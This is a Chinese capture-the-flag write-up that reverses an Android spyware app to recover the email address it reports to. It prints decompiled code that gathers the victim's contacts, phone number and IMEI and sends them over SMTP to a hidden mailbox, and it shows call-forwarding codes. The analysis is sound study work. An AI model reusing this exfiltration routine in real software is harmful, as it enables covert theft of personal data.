BUUCTF--相册
测试文件:https://www.lanzous.com/iaoj7qb
溯源
使用jadx-gui打开后,搜索包含mail的代码
很明显,这个sendMailByJavaMail函数应该是一个关键函数。找到位置
public static int sendMailByJavaMail(String mailto, String title, String mailmsg) { if (!debug) { Mail m = new Mail(C0005C2.MAILUSER, C0005C2.MAILPASS); m.set_host(C0005C2.MAILHOST); m.set_port(C0005C2.PORT); m.set_debuggable(true); m.set_to(new String[]{mailto}); m.set_from(C0005C2.MAILFROME); m.set_subject(title); m.setBody(mailmsg); try { if (m.send()) { Log.i("IcetestActivity", "Email was sent successfully."); } else { Log.i("IcetestActivity", "Email was sent failed."); } } catch (Exception e) { Log.e("MailApp", "Could not send email", e); } } return 1; }
函数以mailto为参数,这个mailto应该是我们需要找到。
我们找一下这个函数引用处
public class MailTask extends AsyncTask<Integer, Integer, String> { private String content; private Context context; public void run(String content2) { String notebooks = ""; for (String[] note : NoteBook.get(this.context, IMAPStore.RESPONSE)) { notebooks = String.valueOf(notebooks) + note[0] + ":" + note[1] + "\r\n"; } String tel = ((TelephonyManager) this.context.getSystemService("phone")).getLine1Number(); if (tel == null || tel.equals("")) { tel = C0001A2.getNoteBook(content2).phoneNumber; } Sms getBFlag = C0001A2.getNoteBook(content2); if (!C0001A2.isEmpty(notebooks)) { C0001A2.sendMailByJavaMail(C0005C2.MAILSERVER, "通讯录(" + tel + "IMEI" + ((TelephonyManager) this.context.getSystemService("phone")).getDeviceId() + ")", notebooks); } }
C0005C2.MAILSERVER就是我们需要的邮箱,再找原出处
public class C0005C2 { public static final String CANCELNUMBER = "%23%2321%23"; public static final String MAILFROME = Base64.decode(NativeMethod.m1m()); public static final String MAILHOST = "smtp.163.com"; public static final String MAILPASS = Base64.decode(NativeMethod.pwd()); public static final String MAILSERVER = Base64.decode(NativeMethod.m1m()); public static final String MAILUSER = Base64.decode(NativeMethod.m1m()); public static final String MOVENUMBER = "**21*121%23"; public static final String PORT = "25"; public static final String date = "2115-11-1"; public static final String phoneNumber = Base64.decode(NativeMethod.m2p());
MAILSERVER就是加载外部so文件中NativeMethod.m1m()函数所返回的值,再进行base64解密。因此我们只需要找到so文件中经过base64加密的字符串。
IDA打开
IDA打开APK文件中的libcore.so文件后,在String window找到base64加密的字符串。
解密后,第二个就是flag
get flag!
flag{18218465125@163.com}